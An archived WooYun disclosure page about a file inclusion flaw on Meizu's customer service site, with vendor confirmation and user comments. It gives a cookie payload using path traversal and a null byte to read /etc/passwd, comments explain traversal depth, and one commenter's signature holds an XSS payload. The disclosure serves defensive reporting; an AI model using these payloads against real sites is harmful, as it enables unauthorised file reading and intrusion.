当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-075335

漏洞标题:魅族客服任意文件包含漏洞

相关厂商:魅族科技

漏洞作者: mango

提交时间:2014-09-07 11:16

修复时间:2014-10-22 11:18

公开时间:2014-10-22 11:18

漏洞类型:命令执行

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-09-07: 细节已通知厂商并且等待厂商处理中
2014-09-08: 厂商已经确认,细节仅向厂商公开
2014-09-18: 细节向核心白帽子及相关领域专家公开
2014-09-28: 细节向普通白帽子公开
2014-10-08: 细节向实习白帽子公开
2014-10-22: 细节向公众公开

简要描述:

详细说明:

http://kf.meizu.com/login.php
修改cookie 

Cookie: customer_service_language=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00


0~EY@6IZY9M}G69XY1EQ32Q.jpg

漏洞证明:

@NX`(FB(E])T[JDMZGUI[9U.jpg

修复方案:

版权声明:转载请注明来源 mango@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2014-09-08 20:29

厂商回复:

谢谢反馈漏洞已经知悉,并在第一时间会予以修复,谢谢!

最新状态:

暂无

漏洞评价:

评论

  1. 2014-09-30 10:56 | U神 ( 核心白帽子 | Rank:1285 漏洞数:142 | 感谢乌云,知恩不忘,其实我一直都在乌云默...)

    53客服包含漏洞一枚!http://www.shangxueba.com/jingyan/1640807.html

  2. 2014-10-22 15:48 | Mody ( 普通白帽子 | Rank:110 漏洞数:27 | "><img src=x onerror=alert(1);> <img s...)

    这是怎嘛发现的啊,好屌!

  3. 2014-10-22 16:48 | Neeke ( 普通白帽子 | Rank:101 漏洞数:24 | 求传授刷Rank方法?)

    @Mody 目测AWVS扫的

  4. 2014-10-22 17:53 | 进击的zjx ( 普通白帽子 | Rank:295 漏洞数:61 | 工作需要,暂别一段时间)

    学习了

  5. 2014-10-22 17:55 | 进击的zjx ( 普通白帽子 | Rank:295 漏洞数:61 | 工作需要,暂别一段时间)

    请教下写几个../../是随便的吗?还是有啥讲究?看你写了十个。。。@mango

  6. 2014-10-22 19:50 | Aug0st ( 普通白帽子 | Rank:105 漏洞数:32 | 看你后面~)

    @进击的zjx 你可以在linux终端下输入cd ../../../../../../../../../ 看下

  7. 2014-10-22 23:50 | mango ( 核心白帽子 | Rank:1668 漏洞数:248 | 我有个2b女友!)

    @Neeke 不是 是看之前这个cms有漏洞就试试了 http://www.shangxueba.com/jingyan/1640807.html

  8. 2014-10-23 09:50 | 进击的zjx ( 普通白帽子 | Rank:295 漏洞数:61 | 工作需要,暂别一段时间)

    @Aug0st @mango 额。里面没讲为何10个../

  9. 2014-10-23 10:03 | U神 ( 核心白帽子 | Rank:1285 漏洞数:142 | 感谢乌云,知恩不忘,其实我一直都在乌云默...)

    @Neeke 没看到我的第一条评论吗?这是53客服通用包含漏洞

  10. 2014-10-23 10:05 | 进击的zjx ( 普通白帽子 | Rank:295 漏洞数:61 | 工作需要,暂别一段时间)

    @U神 U神请教下为何是10个../ 有讲究吗?

  11. 2014-10-23 10:08 | U神 ( 核心白帽子 | Rank:1285 漏洞数:142 | 感谢乌云,知恩不忘,其实我一直都在乌云默...)

    @进击的zjx 一般来说没什么讲究,因为有时候不知道要跳几级目录才能跳到根目录,所以你测试的时候可以一个加一个地测试

  12. 2014-10-23 10:31 | 进击的zjx ( 普通白帽子 | Rank:295 漏洞数:61 | 工作需要,暂别一段时间)

    @U神 谢谢,了解了。。是不是如果5个../跳到根目录,那10个../肯定也是可以的吧,所以就是说测试时不如多写几个

  13. 2014-10-23 11:40 | Neeke ( 普通白帽子 | Rank:101 漏洞数:24 | 求传授刷Rank方法?)

    @U神 目测不准啊 - -#

  14. 2014-10-23 20:53 | Mody ( 普通白帽子 | Rank:110 漏洞数:27 | "><img src=x onerror=alert(1);> <img s...)

    @U神 U神你好叼